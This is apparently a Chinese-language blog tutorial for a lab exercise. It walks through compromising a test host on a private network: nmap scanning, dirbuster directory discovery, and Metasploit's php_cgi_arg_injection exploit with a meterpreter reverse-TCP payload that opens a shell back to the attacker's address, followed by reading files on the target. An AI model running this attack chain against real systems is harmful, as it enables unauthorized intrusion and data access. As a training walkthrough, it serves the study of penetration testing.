Metasploit溢出phpMyAdmin漏洞

    利用phpMyAdmin漏洞上傳***程序,獲得webshell。

    CGI腳本沒有正確處理請求參數,導致源代碼泄露,允許遠程***者在請求參數中插入執行命令。


一、利用nmap工具掃描目標主機

1.1使用nmap命令對目標主機進行掃描。單擊桌面空白處,右鍵菜單選擇“在終端中打開”。


1.2在終端中輸入命令“nmap –sV  192.168.1.3”,對目標主機進行端口掃描,發現開放80端口。

wKioL1hKMD3hu9atAAFM_tPfjEs447.jpg


1.3在瀏覽器地址欄中輸入“http:\\192.168.1.3”,訪問目標網站。

二、利用dirbuster掃描目標主機

2.1在終端中輸入命令“dirbuster”,啓動軟件對目標網站進行掃描。

2.2在Target URL處輸入“192.168.1.3”,在File with list of dirs./file處選擇字典文件(/usr/share/dirbuster/wordlists/目錄下),單擊“Start”按鈕,開始掃描。

wKiom1hKMD6gLgktAAJBXeLhjWk333.jpg



2.3掃描結果顯示包含cgi-bin目錄、phpmyadmin目錄等。

wKiom1hKMD_wFgL3AAEPuvVVb5M587.jpg


三、利用metasploit***目標主機

3.1在終端中輸入命令“msfconsole”,啓動MSF終端。


3.2在終端中輸入命令“search php_cgi”,搜索php_cgi的相關工具和***載荷。


3.3在終端中輸入命令“use exploit/multi/http/php_cgi_arg_injection”,啓用漏洞利用模塊, 提示符就會提示進入到該路徑下。

wKioL1hKMECSFcp4AABvzLI_vck240.jpg



3.4在終端中輸入命令“show payloads”,顯示Metasploit中可以在遠程主機執行的代碼,即shellcode。

3.5在終端中輸入命令“set PAYLOAD php/meterpreter/reverse_tcp”,設置使用的shellcode代碼。

3.6在終端中輸入“show options”,顯示***模塊需要設置的參數。

3.7在終端中輸入“set LHOST 192.168.1.2”,設置源主機的IP地址,用於會話的反向鏈接。

3.8在終端中輸入“set RHOST 192.168.1.3”,設置目標主機的IP。

wKiom1hKMECi4_scAAAwLWTM-ZA247.jpg

wKioL1hKMEHBzoNCAAD9EyYlPEg494.jpg



3.9在終端中輸入“exploit”,開始對目標主機進行***。

wKioL1hKMEKjpkR8AAChA5MMct8360.jpg



3.10在終端中輸入“sysinfo”,查看系統環境信息。

3.11在終端中輸入“ls”,顯示當前目錄下的文件內容。

wKiom1hKMEPB9A2KAAEC4hvPO1k940.jpg


3.12在終端中輸入“cat phpinfo.php”,查看文件內容。

wKioL1hKMESjVon-AAAWhhmfqs0261.jpg


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章